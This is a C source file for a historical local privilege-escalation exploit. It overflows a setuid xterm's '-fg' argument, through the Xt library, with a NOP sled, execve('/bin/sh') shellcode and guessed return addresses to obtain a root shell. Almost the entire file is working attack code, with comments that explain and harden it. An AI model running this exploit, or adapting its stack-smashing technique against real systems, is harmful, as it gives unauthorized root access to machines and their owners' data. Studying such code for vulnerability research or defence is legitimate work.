# Title : Xt Library Local Root Command Execution Exploit
# Published : 1996-08-24
# Author : b0z0 bra1n
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* Tuning knobs; both can be overridden from the command line in main()
 * (argv[1] = offset, argv[2] = size). */
enum {
    DEFAULT_OFFSET = 0,    /* added to get_esp() to form the guessed return address */
    BUFFER_SIZE    = 1491  /* bytes of NOP sled + shellcode written before the return address */
};
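/*
 * Return the current stack pointer as a long.
 *
 * The original read %esp with a basic asm statement and no C return,
 * relying on the value being left in %eax. That is undefined behaviour in
 * C and only works when the compiler happens not to touch the register
 * afterwards; here the register is read through an output operand and
 * returned explicitly. The payload in main() is 32-bit x86 only; other
 * architectures are covered so the program still builds and the printed
 * address is at least a real stack address.
 */
long get_esp(void)
{
    long sp;
#if defined(__i386__)
    __asm__ volatile ("movl %%esp, %0" : "=r" (sp));
#elif defined(__x86_64__)
    __asm__ volatile ("movq %%rsp, %0" : "=r" (sp));
#else
    /* Fallback: the address of a local is, by construction, on this stack. */
    char probe;
    sp = (long)&probe;
#endif
    return sp;
}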
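/* Parse a decimal integer command-line argument.
 * Returns 0 and stores the value in *out, or -1 when the string is empty,
 * has trailing characters, or does not fit in an int. */
static int parse_int_arg(const char *s, int *out)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v < INT_MIN || v > INT_MAX)
        return -1;
    *out = (int)v;
    return 0;
}

/*
 * Entry point. Builds the oversized "-fg" argument and execs xterm with it.
 *
 *   argv[1]  optional offset added to get_esp() to form the guessed return
 *            address (default DEFAULT_OFFSET)
 *   argv[2]  optional size in bytes of the NOP sled + shellcode region
 *            (default BUFFER_SIZE)
 *
 * Layout of the argument handed to xterm:
 *
 *   [0x90 * (bs - shell_len)][execshell][ret][ret]'\0'
 *
 * where ret = get_esp() + ofs is stored twice, each copy sizeof(unsigned
 * long) bytes wide, exactly as the original wrote it. Per the listing's
 * title the overflow is in the Xt library's handling of the resource
 * string; the vulnerable code is not shown here, and the "root" outcome
 * presupposes a setuid-root xterm on the target. The guessed address only
 * lands if xterm's stack layout matches this process's (no ASLR, similar
 * environment) -- hence the tunable offset.
 *
 * Returns 1 on bad arguments, allocation failure or if execl() fails;
 * on success execl() does not return.
 */
int main(int argc, char **argv)
{
    /* BSD-style execve("/bin/sh") shellcode (syscall via lcall $7,$0), copied
     * byte for byte from the original listing with the escape sequences
     * restored. 32-bit x86 only. It contains no 0x00 byte, so it survives
     * being passed as a C string in argv. */
    static const char execshell[] =
        "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2"
        "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0"
        "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"
        "\xeb\x18"
        "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02"
        "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";
    enum { BUFF_ALLOC = 4096, RET_COPIES = 2 };
    const size_t shell_len = sizeof execshell - 1;
    const size_t max_bs = BUFF_ALLOC - RET_COPIES * sizeof(unsigned long) - 1;
    char *buff, *p;
    unsigned long ret;
    int i, ofs = DEFAULT_OFFSET, bs = BUFFER_SIZE;

    if (argc > 1 && parse_int_arg(argv[1], &ofs) != 0) {
        fprintf(stderr, "bad offset '%s'\n", argv[1]);
        return 1;
    }
    if (argc > 2 && parse_int_arg(argv[2], &bs) != 0) {
        fprintf(stderr, "bad buffer size '%s'\n", argv[2]);
        return 1;
    }
    /* The original computed bs - strlen(execshell) unchecked: a bs below the
     * shellcode length wraps to a huge size_t and memset() runs off the end
     * of the 4096-byte heap block, and a bs near 4096 leaves no room for the
     * return addresses and the terminator. */
    if (bs < 0 || (size_t)bs < shell_len || (size_t)bs > max_bs) {
        fprintf(stderr, "buffer size must be between %zu and %zu\n",
                shell_len, max_bs);
        return 1;
    }

    /* Compute the guessed return address once so the printed value is the
     * value written (the original called get_esp() separately for each). */
    ret = (unsigned long)(get_esp() + ofs);
    printf("Using offset of esp + %d (%lx)\nBuffer size %d\n", ofs, ret, bs);
    /* The argument is a C string: a 0x00 byte inside the address would end
     * it early and the copies below would never reach xterm. On a 64-bit
     * build this always fires, which is correct -- the payload cannot work
     * there anyway. */
    if (memchr(&ret, 0, sizeof ret) != NULL)
        fprintf(stderr, "warning: return address %lx contains a 0x00 byte; "
                        "the argument will be cut short there\n", ret);

    buff = malloc(BUFF_ALLOC);
    if (buff == NULL) {
        fprintf(stderr, "can't allocate memory\n");
        return 1;
    }

    memset(buff, 0x90, (size_t)bs - shell_len);               /* NOP sled */
    memcpy(buff + ((size_t)bs - shell_len), execshell, shell_len);
    p = buff + bs;
    for (i = 0; i < RET_COPIES; i++) {
        /* memcpy rather than a cast-and-store: p has no particular alignment. */
        memcpy(p, &ret, sizeof ret);
        p += sizeof ret;
    }
    *p = '\0';

    /* 1996-era path; if xterm is elsewhere or not setuid this does nothing
     * useful. (char *)NULL: the variadic terminator must be pointer-sized. */
    execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, (char *)NULL);
    perror("execl /usr/X11R6/bin/xterm");
    free(buff);
    return 1;
}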